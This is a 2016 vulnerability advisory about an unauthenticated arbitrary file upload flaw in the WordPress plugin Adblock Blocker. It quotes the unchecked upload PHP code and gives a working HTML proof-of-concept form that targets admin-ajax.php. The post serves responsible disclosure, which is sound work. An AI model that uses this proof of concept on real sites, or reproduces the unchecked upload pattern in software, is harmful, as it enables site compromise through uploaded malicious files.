01 Aug

Arbitrary File Upload Vulnerability in Adblock Blocker

As we continue review old third-party data on hacking attempts to identity more vulnerabilities that hackers have likely already discovered in WordPress plugins we spotted an arbitrary file upload vulnerability in the plugin Adblock Blocker.

Back in February a request was made for the file /wp-content/plugins/addblockblocker/style.css, as part of what looks to be a series of requests looking for usage of plugins. Looking over that plugin for any obvious issues we found that in the current version of the it, 0.0.1, a file upload capability is accessible without being logged, despite only being intended to be accessed by users logged in as Administrators.

The issue starts with the function adblocker_ajax_callback() being made accessible through WordPress AJAX functionality to those not logged in (in the file /adblockbloker.php):

52
add_action('wp_ajax_nopriv_getcountryuser', 'adblocker_ajax_callback');

That function then loads the file getcountryuser.php:

54
55
56
57
function adblocker_ajax_callback() {
 
	include('getcountryuser.php');
}

In that file if a GET or POST input is set to something than “1” or “3” the following code will save the submitted file to WordPress’ upload directory:

32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
global $wpdb;
$usermsg = $_POST['usermsg'];
if(empty($usermsg)){$usermsg = ' ';}
$redirectpath = admin_url().'admin.php?page=addblock';
update_option('usermsg',$usermsg);			
// Example of accessing data for a newly uploaded file
$fileName = $_FILES["popimg"]["name"]; 
$fileTmpLoc = $_FILES["popimg"]["tmp_name"];
 
// Path and file name			
$path_array  = wp_upload_dir();	
 
$pathAndName= $path_array['path'].'/' . $fileName;
 
$moveResult = move_uploaded_file($fileTmpLoc, $pathAndName);

Proof of Concept

The following proof of concept will upload the selected  file and put it in the current month’s directory inside of the /wp-content/uploads/ directory.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=getcountryuser&cs=2" method="POST" enctype="multipart/form-data">
<input type="file" name="popimg" /> 
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 7/25/2016 – Developer notified.
  • 8/1/2016 – WordPress.org Plugin Directory notified.

Leave a Reply

Your email address will not be published. Required fields are marked *